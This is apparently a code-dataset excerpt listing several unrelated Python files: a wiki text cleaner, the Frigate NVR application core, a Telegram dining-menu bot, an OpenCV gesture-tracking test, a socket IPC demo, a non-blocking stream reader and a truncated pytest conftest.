| source (strings, 3-86 chars) | python (strings, 75-1.04M chars) |
|---|---|
cleaner.py
|
from utils.vector_manager import VectorManager
from pattern.en import tokenize
from time import time
import multiprocessing as mp
import os
import re
import sys
import argparse
def cleanhtml(raw_html):
"""
Removes the <doc> tags remaining from wikiExtracted data
:param raw_html: html/text content of a file with many docs
:return: only text from raw_html
"""
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, ' ', raw_html)
return cleantext
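# Example (illustrative input): cleanhtml('<doc id="1">Title\n\nBody</doc>')
# returns ' Title\n\nBody ' -- each tag is replaced by a single space.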
def remove_title(text):
"""
Removes the title of a document
:param text: text containing an article output from cleanhtml()
:return: text of the article without title
"""
index = text.find("\n\n")
if index != -1:
return text[index+2:]
else:
return text
def is_number(s):
"""
Checks if the parameter s is a number
:param s: anything
:return: true if s is a number, false otherwise
"""
try:
float(s)
return True
except ValueError:
return False
def _transform_file(file_path, debug=False):
"""
Transforms a file containing articles into words grouped into sentences,
paragraphs and docs (a 4D structure encoded as newline-separated text), and
writes the result to disk as filename_wl (words list).
:param file_path: file to transform
"""
if debug:
print("Cleaning %s" % file_path)
with open(file_path) as f:
raw = f.read().decode("latin-1")
data = cleanhtml(raw)
docs = data.split("</doc>")
del data
file_out = "%s_wl" % file_path
file_string = ""
for doc in [d.strip() for d in docs if d.strip()]:
paragraphs = [tokenize(par) for par in remove_title(cleanhtml(doc)).strip().split("\n\n") if par]
doc_a = False
for p in paragraphs:
par_a = False
for sent in p:
line = " ".join([word for word in sent.lower().split()
if word.isalpha() or is_number(word)])
if line:
file_string += line + "\n"
par_a = True
doc_a = True
if par_a:
file_string += "\n"
if doc_a:
file_string += "\n"
VectorManager.write_string(file_out, file_string.encode("latin-1"))
del file_string
if debug:
print("Done with %s" % file_path)
def transform(dirname, debug=False):
"""
Handles the parallel transformation of the whole dataset into 4D lists
"""
for root, dirs, files in os.walk(dirname):
filtered_files = ["%s/%s" % (root, file) for file in files if
is_number(file.split("_")[1]) and len(file.split("_")) == 2]
threads = min(mp.cpu_count() * 4, filtered_files)
print("Starting %s processes to clean %s files" % (threads, len(filtered_files)))
i = 0
while i < len(filtered_files):
ps = []
j = 0
while j < threads and (i + j) < len(filtered_files):
if debug:
print("[%s] Creating %s of %s for file %s" % (
i, i + j, len(filtered_files), filtered_files[i + j]))
p = (mp.Process(target=_transform_file, args=(filtered_files[i + j],)))
p.start()
ps.append(p)
j += 1
if debug:
print("%s process in the list to join" % len(ps))
j = 0
while j < threads and (i + j) < len(filtered_files):
if debug:
print("[%s] Joining %s of %s for file %s" % (
i, j, len(filtered_files), filtered_files[i + j]))
ps[j].join()
j += 1
i += j
sys.stdout.flush()
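# A minimal alternative sketch, not used by the pipeline above: the manual batch-and-join
# logic in transform() could also be written with a process pool. transform_with_pool is a
# hypothetical name; it assumes _transform_file stays importable at module level.
def transform_with_pool(dirname):
    for root, _, files in os.walk(dirname):
        targets = ["%s/%s" % (root, f) for f in files
                   if len(f.split("_")) == 2 and is_number(f.split("_")[1])]
        pool = mp.Pool(processes=mp.cpu_count())
        pool.map(_transform_file, targets)  # one file per worker task
        pool.close()
        pool.join()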
def clean_data(files_path):
"""
Wrapper function that cleans the data and transforms it into 4D lists. Called either from
main or as a block of the pipeline.
:param files_path: path of the files to convert
:return: None; the transformed files are written to disk, ready to be fed to the Word2Vec model
"""
print("[BLOCK] Transforming sentences to 4-dimensional lists")
transform(files_path)
print("[BLOCK] Done transforming data")
sys.stdout.flush()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', type=str, help="Path of the data to be used for the word embeddings"
" and clean up.", required=True)
args = parser.parse_args()
data_path = args.data
print("Cleaning data from %s" % (data_path))
begin = time()
clean_data(data_path)
end = time()
print("Total processing time: %d seconds" % (end - begin))
|
app.py
|
import json
import logging
import multiprocessing as mp
import os
from logging.handlers import QueueHandler
from typing import Dict, List
import sys
import signal
import yaml
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from peewee_migrate import Router
from playhouse.sqlite_ext import SqliteExtDatabase
from playhouse.sqliteq import SqliteQueueDatabase
from frigate.config import FrigateConfig
from frigate.const import RECORD_DIR, CLIPS_DIR, CACHE_DIR
from frigate.edgetpu import EdgeTPUProcess
from frigate.events import EventProcessor, EventCleanup
from frigate.http import create_app
from frigate.log import log_process, root_configurer
from frigate.models import Event
from frigate.mqtt import create_mqtt_client
from frigate.object_processing import TrackedObjectProcessor
from frigate.record import RecordingMaintainer
from frigate.stats import StatsEmitter, stats_init
from frigate.video import capture_camera, track_camera
from frigate.watchdog import FrigateWatchdog
from frigate.zeroconf import broadcast_zeroconf
logger = logging.getLogger(__name__)
class FrigateApp:
def __init__(self):
self.stop_event = mp.Event()
self.config: FrigateConfig = None
self.detection_queue = mp.Queue()
self.detectors: Dict[str, EdgeTPUProcess] = {}
self.detection_out_events: Dict[str, mp.Event] = {}
self.detection_shms: List[mp.shared_memory.SharedMemory] = []
self.log_queue = mp.Queue()
self.camera_metrics = {}
def set_environment_vars(self):
for key, value in self.config.environment_vars.items():
os.environ[key] = value
def ensure_dirs(self):
for d in [RECORD_DIR, CLIPS_DIR, CACHE_DIR]:
if not os.path.exists(d) and not os.path.islink(d):
logger.info(f"Creating directory: {d}")
os.makedirs(d)
else:
logger.debug(f"Skipping directory: {d}")
def init_logger(self):
self.log_process = mp.Process(
target=log_process, args=(self.log_queue,), name="log_process"
)
self.log_process.daemon = True
self.log_process.start()
root_configurer(self.log_queue)
def init_config(self):
config_file = os.environ.get("CONFIG_FILE", "/config/config.yml")
self.config = FrigateConfig(config_file=config_file)
for camera_name in self.config.cameras.keys():
# create camera_metrics
self.camera_metrics[camera_name] = {
"camera_fps": mp.Value("d", 0.0),
"skipped_fps": mp.Value("d", 0.0),
"process_fps": mp.Value("d", 0.0),
"detection_enabled": mp.Value(
"i", self.config.cameras[camera_name].detect.enabled
),
"detection_fps": mp.Value("d", 0.0),
"detection_frame": mp.Value("d", 0.0),
"read_start": mp.Value("d", 0.0),
"ffmpeg_pid": mp.Value("i", 0),
"frame_queue": mp.Queue(maxsize=2),
}
def check_config(self):
for name, camera in self.config.cameras.items():
assigned_roles = list(
set([r for i in camera.ffmpeg.inputs for r in i.roles])
)
if not camera.clips.enabled and "clips" in assigned_roles:
logger.warning(
f"Camera {name} has clips assigned to an input, but clips is not enabled."
)
elif camera.clips.enabled and not "clips" in assigned_roles:
logger.warning(
f"Camera {name} has clips enabled, but clips is not assigned to an input."
)
if not camera.record.enabled and "record" in assigned_roles:
logger.warning(
f"Camera {name} has record assigned to an input, but record is not enabled."
)
elif camera.record.enabled and not "record" in assigned_roles:
logger.warning(
f"Camera {name} has record enabled, but record is not assigned to an input."
)
if not camera.rtmp.enabled and "rtmp" in assigned_roles:
logger.warning(
f"Camera {name} has rtmp assigned to an input, but rtmp is not enabled."
)
elif camera.rtmp.enabled and not "rtmp" in assigned_roles:
logger.warning(
f"Camera {name} has rtmp enabled, but rtmp is not assigned to an input."
)
def set_log_levels(self):
logging.getLogger().setLevel(self.config.logger.default)
for log, level in self.config.logger.logs.items():
logging.getLogger(log).setLevel(level)
if not "geventwebsocket.handler" in self.config.logger.logs:
logging.getLogger("geventwebsocket.handler").setLevel("ERROR")
def init_queues(self):
# Queues for clip processing
self.event_queue = mp.Queue()
self.event_processed_queue = mp.Queue()
# Queue for cameras to push tracked objects to
self.detected_frames_queue = mp.Queue(
maxsize=len(self.config.cameras.keys()) * 2
)
def init_database(self):
migrate_db = SqliteExtDatabase(self.config.database.path)
# Run migrations
del logging.getLogger("peewee_migrate").handlers[:]
router = Router(migrate_db)
router.run()
migrate_db.close()
self.db = SqliteQueueDatabase(self.config.database.path)
models = [Event]
self.db.bind(models)
def init_stats(self):
self.stats_tracking = stats_init(self.camera_metrics, self.detectors)
def init_web_server(self):
self.flask_app = create_app(
self.config,
self.db,
self.stats_tracking,
self.detected_frames_processor,
self.mqtt_client,
)
def init_mqtt(self):
self.mqtt_client = create_mqtt_client(self.config, self.camera_metrics)
def start_detectors(self):
model_shape = (self.config.model.height, self.config.model.width)
for name in self.config.cameras.keys():
self.detection_out_events[name] = mp.Event()
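# Per-camera shared memory pair: the input buffer holds one frame at the model
# resolution (height * width * 3 bytes), and the output buffer is sized as
# 20 * 6 * 4 bytes (presumably up to 20 detections of 6 float32 values each).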
shm_in = mp.shared_memory.SharedMemory(
name=name,
create=True,
size=self.config.model.height * self.config.model.width * 3,
)
shm_out = mp.shared_memory.SharedMemory(
name=f"out-{name}", create=True, size=20 * 6 * 4
)
self.detection_shms.append(shm_in)
self.detection_shms.append(shm_out)
for name, detector in self.config.detectors.items():
if detector.type == "cpu":
self.detectors[name] = EdgeTPUProcess(
name,
self.detection_queue,
self.detection_out_events,
model_shape,
"cpu",
detector.num_threads,
)
if detector.type == "edgetpu":
self.detectors[name] = EdgeTPUProcess(
name,
self.detection_queue,
self.detection_out_events,
model_shape,
detector.device,
detector.num_threads,
)
def start_detected_frames_processor(self):
self.detected_frames_processor = TrackedObjectProcessor(
self.config,
self.mqtt_client,
self.config.mqtt.topic_prefix,
self.detected_frames_queue,
self.event_queue,
self.event_processed_queue,
self.stop_event,
)
self.detected_frames_processor.start()
def start_camera_processors(self):
model_shape = (self.config.model.height, self.config.model.width)
for name, config in self.config.cameras.items():
camera_process = mp.Process(
target=track_camera,
name=f"camera_processor:{name}",
args=(
name,
config,
model_shape,
self.detection_queue,
self.detection_out_events[name],
self.detected_frames_queue,
self.camera_metrics[name],
),
)
camera_process.daemon = True
self.camera_metrics[name]["process"] = camera_process
camera_process.start()
logger.info(f"Camera processor started for {name}: {camera_process.pid}")
def start_camera_capture_processes(self):
for name, config in self.config.cameras.items():
capture_process = mp.Process(
target=capture_camera,
name=f"camera_capture:{name}",
args=(name, config, self.camera_metrics[name]),
)
capture_process.daemon = True
self.camera_metrics[name]["capture_process"] = capture_process
capture_process.start()
logger.info(f"Capture process started for {name}: {capture_process.pid}")
def start_event_processor(self):
self.event_processor = EventProcessor(
self.config,
self.camera_metrics,
self.event_queue,
self.event_processed_queue,
self.stop_event,
)
self.event_processor.start()
def start_event_cleanup(self):
self.event_cleanup = EventCleanup(self.config, self.stop_event)
self.event_cleanup.start()
def start_recording_maintainer(self):
self.recording_maintainer = RecordingMaintainer(self.config, self.stop_event)
self.recording_maintainer.start()
def start_stats_emitter(self):
self.stats_emitter = StatsEmitter(
self.config,
self.stats_tracking,
self.mqtt_client,
self.config.mqtt.topic_prefix,
self.stop_event,
)
self.stats_emitter.start()
def start_watchdog(self):
self.frigate_watchdog = FrigateWatchdog(self.detectors, self.stop_event)
self.frigate_watchdog.start()
def start(self):
self.init_logger()
try:
try:
self.init_config()
except Exception as e:
print(f"Error parsing config: {e}")
self.log_process.terminate()
sys.exit(1)
self.set_environment_vars()
self.ensure_dirs()
self.check_config()
self.set_log_levels()
self.init_queues()
self.init_database()
self.init_mqtt()
except Exception as e:
print(e)
self.log_process.terminate()
sys.exit(1)
self.start_detectors()
self.start_detected_frames_processor()
self.start_camera_processors()
self.start_camera_capture_processes()
self.init_stats()
self.init_web_server()
self.start_event_processor()
self.start_event_cleanup()
self.start_recording_maintainer()
self.start_stats_emitter()
self.start_watchdog()
# self.zeroconf = broadcast_zeroconf(self.config.mqtt.client_id)
def receiveSignal(signalNumber, frame):
self.stop()
sys.exit()
signal.signal(signal.SIGTERM, receiveSignal)
server = pywsgi.WSGIServer(
("127.0.0.1", 5001), self.flask_app, handler_class=WebSocketHandler
)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
self.stop()
def stop(self):
logger.info(f"Stopping...")
self.stop_event.set()
self.detected_frames_processor.join()
self.event_processor.join()
self.event_cleanup.join()
self.recording_maintainer.join()
self.stats_emitter.join()
self.frigate_watchdog.join()
self.db.stop()
for detector in self.detectors.values():
detector.stop()
while len(self.detection_shms) > 0:
shm = self.detection_shms.pop()
shm.close()
shm.unlink()
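# Typical entry point, shown here only as a sketch (the real project wires this up in
# its own launcher module):
#
#     if __name__ == "__main__":
#         frigate_app = FrigateApp()
#         frigate_app.start()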
|
menubot.py
|
import base64
import json
import os
import re
import threading
import time
import traceback
from dataclasses import dataclass
from pathlib import Path
import json5
import requests
import schedule as schedule
from bs4 import BeautifulSoup
from telegram import Update
from telegram.ext import Updater, CallbackContext, Dispatcher, CommandHandler, MessageHandler, \
Filters
@dataclass
class MenuItem:
name: str
serving_size: str
price: float
calories: int
# menu_id_map[menu name] = menu id
MenuIdMap = dict[str, str]
# dining_halls[hall name][menu name] = menu id
DiningHalls = dict[str, MenuIdMap]
RawMenu = list[list[str]]
Menu = dict[str, list[MenuItem]]
def report(msg: str) -> None:
print(msg)
def get_dining_halls() -> DiningHalls:
r: str = requests.get('https://fso.ueat.utoronto.ca/FSO/ServiceMenuReport/Today').text
m: list[str] = re.findall(r"ASPx\.createControl\(MVCxClientMenu,'mnuUnits','',.*", r)
if len(m) == 0:
raise AssertionError('Failed to get menu units. Maybe API changed?')
data = m[0]
data = data.replace("ASPx.createControl(MVCxClientMenu,'mnuUnits','',", '')[:-2]
data = re.sub(r"{'ItemClick':function.*?;}},", '', data)
b64 = re.findall(r"(?<={'itemsInfo':')[A-Za-z0-9=]*(?='})", data)[0]
b64 = base64.b64decode(b64).decode('utf-8')
items_json = re.findall(r"(?<={'items':).*(?=})", data)[0]
items = json5.loads(items_json)[0]['items']
dining_halls: DiningHalls = {}
# Get dining hall names
for i in items:
first_id = i['items'][0]['name']
name = re.findall(f"(?<=.)[A-Za-z0-9() ]+(?=.*\\${first_id})", b64)[-1]
dining_halls[name] = {}
# Get menu names
for menu in i['items']:
mn = re.findall(f"(?<=\\${menu['name']}).*?[A-Za-z0-9() ]+(?=.)", b64)[0]
mn = re.findall(r"[A-Za-z0-9() ]+", mn)[0]
dining_halls[name][mn] = menu['name']
return dining_halls
def get_menu(id: str) -> tuple[RawMenu, Menu]:
r = requests.post(f" https://fso.ueat.utoronto.ca/FSO/ServiceMenuReport/GetReport/{id}").text
s = BeautifulSoup(r, 'html.parser')
# Parse table
t = s.find('table')
d = [[i.text.strip() for i in r.find_all('td')] for r in t.find_all('tr')]
data = {}
current: list[MenuItem] = []
for i in d[1:]:
# Title
if len(i) == 1:
current = []
data[i[0]] = current
# Item
else:
current.append(MenuItem(i[0], i[1], float(i[2] or '-1'), int(i[3] or '-1')))
return d, data
def filter_menu(menu: Menu) -> Menu:
menu: Menu = \
{m: [i for i in menu[m] if i.price != -1] for m in menu}
for m in menu:
for i in menu[m]:
i.name = i.name.replace(' - Small', '').replace(' - Large', '')
names = {n.name for n in menu[m]}
menu[m] = [[i for i in menu[m] if i.name == n][0] for n in names]
return menu
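# A minimal usage sketch of the scraping helpers above. example_lunch_menu is a
# hypothetical name, and 'Some Hall' / 'Lunch' are made-up keys; real names come
# from get_dining_halls().
def example_lunch_menu(hall_name: str = 'Some Hall') -> Menu:
    halls = get_dining_halls()
    menu_id = halls[hall_name]['Lunch']       # MenuIdMap: menu name -> menu id
    return filter_menu(get_menu(menu_id)[1])  # get_menu returns (raw rows, parsed menu)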
if __name__ == '__main__':
# Find telegram token
path = Path(os.path.abspath(__file__)).parent
db_path = path.joinpath('menu_bot_database.json')
if 'tg_token' in os.environ:
tg_token = os.environ['tg_token']
else:
with open(path.joinpath('menu_bot_token.txt'), 'r', encoding='utf-8') as f:
tg_token = f.read().strip()
# Telegram login
updater = Updater(token=tg_token, use_context=True)
dispatcher: Dispatcher = updater.dispatcher
# Database
def save_db():
with open(db_path, 'w', encoding='utf-8') as f:
json.dump(database, f)
schedule.clear()
for d in database:
def func(d=d):  # bind d now to avoid the late-binding closure bug
menu_helper(d[0], d[1])
schedule.every().day.at('07:00').do(func)
database: list[tuple[int, list[str]]]
if os.path.isfile(db_path):
with open(db_path, 'r', encoding='utf-8') as f:
database = json.load(f)
save_db()
else:
database = []
def r(u: Update, msg: str, md=True):
updater.bot.sendMessage(chat_id=u.effective_chat.id, text=msg,
parse_mode='Markdown' if md else None)
def start(u: Update, c: CallbackContext):
r(u, 'Hi, start with /halls')
def error(u: Update, c: CallbackContext):
traceback.print_exc()
r(u, str(c.error), False)
def dining_halls(u: Update, c: CallbackContext):
halls = get_dining_halls()
r(u, '*Available Dining Halls:* \n' + '\n'.join(halls.keys()) + '\n\nNext: /menus <hall>')
def get_hall_with_name(hall: str) -> tuple[str, MenuIdMap]:
hall = hall.lower()
halls = get_dining_halls()
h = [h for h in halls if h.lower().startswith(hall)]
if len(h) == 0:
raise AssertionError(f'No dining hall {hall} found.')
return h[0], halls[h[0]]
def get_menu_with_name(hall: str, menu: str) -> tuple[str, str, Menu]:
menu = menu.lower()
hall, h = get_hall_with_name(hall)
m = [m for m in h if m.lower().startswith(menu)]
if len(m) == 0:
raise AssertionError(f'No menu {menu} found in {hall}.')
return hall, m[0], get_menu(h[m[0]])[1]
def get_menu_cats(hall: str, menu: str, cats: list[str]) -> tuple[str, str, Menu]:
hall, menu, m = get_menu_with_name(hall, menu)
m = filter_menu(m)
copy_cats = cats.copy()
cats = [c.lower() for c in cats]
cats = [([n for n in m if n.lower().startswith(c)] or [''])[0] for c in cats]
cats = [c for c in cats if c != '']
if len(cats) == 0:
raise AssertionError(f'No categories in {copy_cats} are valid.')
m = {c: m[c] for c in cats}
return hall, menu, m
def menus(u: Update, c: CallbackContext):
if len(c.args) != 1:
r(u, 'Usage: /menus <hall>')
return
hall = c.args[0]
hall, h = get_hall_with_name(hall)
r(u, '*Available Menus:* \n' + '\n'.join(h.keys()) + '\n\nNext: /cats <hall> <menu>')
def categories(u: Update, c: CallbackContext):
if len(c.args) < 2:
r(u, 'Usage: /categories <hall> <menu>')
return
hall, menu = c.args[:2]
hall, menu, m = get_menu_with_name(hall, menu)
r(u, '*Available Categories:* \n' + '\n'.join(m.keys()) + '\n\nNext: /menu <hall> <menu> <cats>')
def menu_helper(chat_id: int, args: list[str]):
print('Menu helper called.', chat_id, args)
hall, menu = args[:2]
cats = args[2:]
hall, menu, m = get_menu_cats(hall, menu, cats)
for n in m:
m[n].sort(key=lambda x: -x.price)
msg = f"*Today's Menu for {menu}:* \n" + \
'\n'.join(f"\n*{n}:* \n" + '\n'.join(
f"{i + 1}. {m[n][i].name} - ${m[n][i].price}" for i in range(len(m[n])))
for n in m)
updater.bot.sendMessage(chat_id=chat_id, text=msg, parse_mode='Markdown')
def menu(u: Update, c: CallbackContext):
if len(c.args) < 2:
r(u, 'Usage: /menu <hall> <menu> <categories>')
return
menu_helper(u.effective_chat.id, c.args)
def channel_update(u: Update, c: CallbackContext):
if u.channel_post is None or u.channel_post.text is None:
return
args = u.channel_post.text.split()
cmd = args[0]
args = args[1:]
id = u.effective_chat.id
if cmd == '/config':
database.append((id, args))
save_db()
menu_helper(id, args)
r(u, 'Scheduled every day at 7:00.')
elif cmd == '/clear':
to_remove = [d for d in database if d[0] == id]
[database.remove(d) for d in to_remove]
save_db()
elif cmd == '/debug':
r(u, json.dumps(database))
# Scheduler thread
def thread_func():
while True:
schedule.run_pending()
time.sleep(2)
threading.Thread(target=thread_func).start()
# Commands
dispatcher.add_error_handler(error)
dispatcher.add_handler(CommandHandler('start', start))
dispatcher.add_handler(CommandHandler('halls', dining_halls))
dispatcher.add_handler(CommandHandler('menus', menus))
dispatcher.add_handler(CommandHandler('categories', categories))
dispatcher.add_handler(CommandHandler('cats', categories))
dispatcher.add_handler(CommandHandler('menu', menu))
dispatcher.add_handler(MessageHandler(Filters.update, channel_update))
updater.start_polling()
#
# menu = filter_menu(get_menu('f1343803-84f6-4b4f-bbfd-a374ed6bd00e')[1])
# menu = {m: menu[m] for m in ['Soup', 'Lunch Entree', 'Pan Station']}
|
test.py
|
import cv2
import time
from motion import Motion
from tornado import web, ioloop
import threading
import json
import requests
from config import config
import logging
import main
def nothing(x):
pass
def ManageMotion():
motion = Motion()
# Param on the fly
cv2.namedWindow('paramMinMax')
cv2.createTrackbar('MAX H', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MAX S', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MAX V', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MIN H', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MIN S', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MIN V', 'paramMinMax', 1, 255, nothing)
cv2.setTrackbarPos('MAX H', 'paramMinMax', config['hand']['hsv_max_blue'][0])
cv2.setTrackbarPos('MAX S', 'paramMinMax', config['hand']['hsv_max_blue'][1])
cv2.setTrackbarPos('MAX V', 'paramMinMax', config['hand']['hsv_max_blue'][2])
cv2.setTrackbarPos('MIN H', 'paramMinMax', config['hand']['hsv_min_blue'][0])
cv2.setTrackbarPos('MIN S', 'paramMinMax', config['hand']['hsv_min_blue'][1])
cv2.setTrackbarPos('MIN V', 'paramMinMax', config['hand']['hsv_min_blue'][2])
cv2.namedWindow('paramSearchRange')
cv2.createTrackbar('INC H', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('INC S', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('INC V', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('DEC H', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('DEC S', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('DEC V', 'paramSearchRange', 1, 255, nothing)
cv2.setTrackbarPos('INC H', 'paramSearchRange', config['hand']['hsv_inc_blue'][0])
cv2.setTrackbarPos('INC S', 'paramSearchRange', config['hand']['hsv_inc_blue'][1])
cv2.setTrackbarPos('INC V', 'paramSearchRange', config['hand']['hsv_inc_blue'][2])
cv2.setTrackbarPos('DEC H', 'paramSearchRange', config['hand']['hsv_dec_blue'][0])
cv2.setTrackbarPos('DEC S', 'paramSearchRange', config['hand']['hsv_dec_blue'][1])
cv2.setTrackbarPos('DEC V', 'paramSearchRange', config['hand']['hsv_dec_blue'][2])
frameIdx = 0
currentSliding = "None"
timeElapsedSinceLastSlide = time.time()
while motion.IsActive():
# Refresh OpenCV
cv2.waitKey(1)
main.ManageCommands(motion)
# Refresh config from param
config['hand']['hsv_upper_blue'] = [cv2.getTrackbarPos('MAX H', 'paramMinMax'), cv2.getTrackbarPos('MAX S', 'paramMinMax'), cv2.getTrackbarPos('MAX V', 'paramMinMax')]
config['hand']['hsv_lower_blue'] = [cv2.getTrackbarPos('MIN H', 'paramMinMax'), cv2.getTrackbarPos('MIN S', 'paramMinMax'), cv2.getTrackbarPos('MIN V', 'paramMinMax')]
config['hand']['hsv_inc_blue'] = [cv2.getTrackbarPos('INC H', 'paramSearchRange'), cv2.getTrackbarPos('INC S', 'paramSearchRange'), cv2.getTrackbarPos('INC V', 'paramSearchRange')]
config['hand']['hsv_dec_blue'] = [cv2.getTrackbarPos('DEC H', 'paramSearchRange'), cv2.getTrackbarPos('DEC S', 'paramSearchRange'), cv2.getTrackbarPos('DEC V', 'paramSearchRange')]
# Manage motion and gestures
motion.GetInformationOnNextFrame()
# Infos movement
try:
cv2.putText(motion.frameDifference, "Elapsed: " + str(motion.TimeElapsedSinceLastMotion()) + "/" + str(config['timeToWaitWhenNoMovementBeforeSleep']), (5, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)
cv2.putText(motion.frameDifference, "Movement: " + str(motion.movementRatio) + "/" + str(config['frameDifferenceRatioForMovement']), (5, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)
cv2.imshow('Movement detected', motion.frameDifference)
except:
pass
if motion.TimeElapsedSinceLastMotion() > config['timeToWaitWhenNoMovementBeforeSleep']:
cv2.putText(motion.currentFrame, "SLEEP MODE NO MOVEMENT", (5, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)
cv2.imshow('Current Frame', motion.currentFrame)
time.sleep(config['timeToSleepWhenNoMovement'])
gesture = motion.GetGesture()
if gesture.properties['palm']:
print("PALM")
threading.Thread(target=main.SendGesture, args=(gesture,)).start()
# Gesture infos
try:
#print("Frame: " + str(frameIdx))
frameIdx += 1
#print(gesture.properties)
if motion.handTracked is None:
cv2.putText(motion.currentFrame, "Seach Palm", (5, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.imshow('Current Frame', motion.currentFrame)
cv2.imshow('Mask from HSV Range', motion.mask_rafined)
cv2.putText(motion.currentFrame, "Width: " + str(gesture.recW), (5, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.putText(motion.currentFrame, "Height: " + str(gesture.recH), (5, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.putText(motion.currentFrame, "SRatio: " + str(gesture.recH / gesture.recW), (5, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.rectangle(motion.currentFrame, (gesture.recX, gesture.recY), (gesture.recX + gesture.recW, gesture.recY + gesture.recH), (0, 255, 0), 2)
cv2.putText(motion.currentFrame, "MSize: " + str(gesture.moments['m00']), (5, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.drawContours(motion.currentFrame, [gesture.handContour], 0, (0, 255, 0), 3)
cv2.circle(motion.currentFrame, (int(gesture.centerX), int(gesture.centerY)), int(gesture.radius / 1.5), [255, 0, 255], 1)
cv2.circle(motion.currentFrame, (int(gesture.centerX), int(gesture.centerY)), int(gesture.radius / 3.2), [255, 0, 255], 1)
cv2.putText(motion.currentFrame, "A: " + str(gesture.properties['angle']), (5, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, 200)
if gesture.properties['palm']:
cv2.putText(motion.currentFrame, "PALM", (5, 400), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
elif gesture.properties['thumbsUp']:
cv2.putText(motion.currentFrame, "THUMBS UP", (5, 400), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
elif gesture.properties['thumbsDown']:
cv2.putText(motion.currentFrame, "THUMBS DOWN", (5, 400), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
if gesture.properties['slideUp'] or gesture.properties['slideDown'] or gesture.properties['slideRight'] or gesture.properties['slideLeft']:
timeElapsedSinceLastSlide = time.time()
currentSliding ="UP" if gesture.properties['slideUp'] else "DOWN" if gesture.properties['slideDown'] else "RIGHT" if gesture.properties['slideRight'] else "LEFT"
if time.time() - timeElapsedSinceLastSlide < 1:
cv2.putText(motion.currentFrame, "Sliding " + currentSliding, (5, 450), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
for defect in gesture.palmDefects:
cv2.line(motion.currentFrame, defect[0], defect[1], [255, 0, 0], 2)
cv2.circle(motion.currentFrame, defect[2], 6, [0, 0, 255], -1)
cv2.imshow('Current Frame', motion.currentFrame)
except:
pass
pressedKey = cv2.waitKey(33)
if pressedKey == 27: # Esc key to stop
break
motion.Dispose()
if __name__ == '__main__':
threading.Thread(target=ManageMotion).start()
application = web.Application([
(r"/takePhoto", main.CommandHandler),
])
application.listen(3001)
ioloop.IOLoop.current().start()
|
socket-preview-progs.py
|
"Sockets and independent programs"
'''
Although sockets work for threads, the shared memory model of threads often allows
them to employ simpler communication devices such as shared names and objects and
queues. Sockets tend to shine brighter when used for IPC by separate processes and
independently launched programs.
'''
"""
same socket, but talk between independent programs too, not just threads;
server here runs in a process and serves both process and thread clients;
sockets are machine-global, much like fifos: don't require shared memory
"""
from socket_preview import server, client # both use same port number
import sys, os
from threading import Thread
mode = int(sys.argv[1]) # run server in this process
if mode == 1:
server()
elif mode == 2: # run client in this process
client('client:process=%s' % os.getpid())
elif mode == 3:
for i in range(5): # run 5 client threads in process
Thread(target=client, args=('client:thread=%s' % i,)).start()
"""
First, start the server in a process as an independently launched program in
its own window; this process runs perpetually waiting for clients to request connections.
C:\...\PP4E\System\Processes> socket-preview-progs.py 1
Now, in another window, run a few clients in both processes and threads, by launching
them as independent programs: using 2 as the command-line argument runs a single
client process, while 3 spawns five threads to converse with the server in parallel:
C:\...\PP4E\System\Processes> socket-preview-progs.py 2
C:\...\PP4E\System\Processes> socket-preview-progs.py 3
"""
|
nbsr.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# no unicode literals
import threading
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
# Non-blocking stream reader inspired by:
# https://stackoverflow.com/q/41431882/149111
class NonBlockingStreamReader:
def __init__(self, stream):
self.stream = stream
self.queue = Queue()
self.stop_event = threading.Event()
def populateQueue(stream, queue):
while not self.stop_event.is_set():
try:
line = stream.readline()
if line:
queue.put(line)
continue
except IOError:
pass
if not self.stop_event.is_set():
raise EndOfStreamError
break
self.thread = threading.Thread(
target=populateQueue, args=(self.stream, self.queue)
)
self.thread.daemon = True
self.thread.start()
def shutdown(self):
self.stop_event.set()
def stop(self, timeout=5):
self.thread.join(timeout=timeout)
def readline(self, timeout=None):
try:
return self.queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
class EndOfStreamError(Exception):
pass
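# A minimal usage sketch, not part of the original module: wrap a subprocess pipe so the
# caller can poll for output without blocking. The command below is only an example.
#
#     import subprocess
#     proc = subprocess.Popen(['ping', 'localhost'], stdout=subprocess.PIPE)
#     reader = NonBlockingStreamReader(proc.stdout)
#     line = reader.readline(timeout=0.5)   # None if nothing arrived within the timeout
#     if line is not None:
#         print(line)
#     reader.shutdown()                     # ask the reader thread to stop
#     reader.stop()                         # join it (with a timeout)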
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, ActionsWebhookServer, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient, PytestConf, GraphQLWSClient
import threading
import random
from datetime import datetime
import sys
import os
from collections import OrderedDict
from validate import assert_response_code
def pytest_addoption(parser):
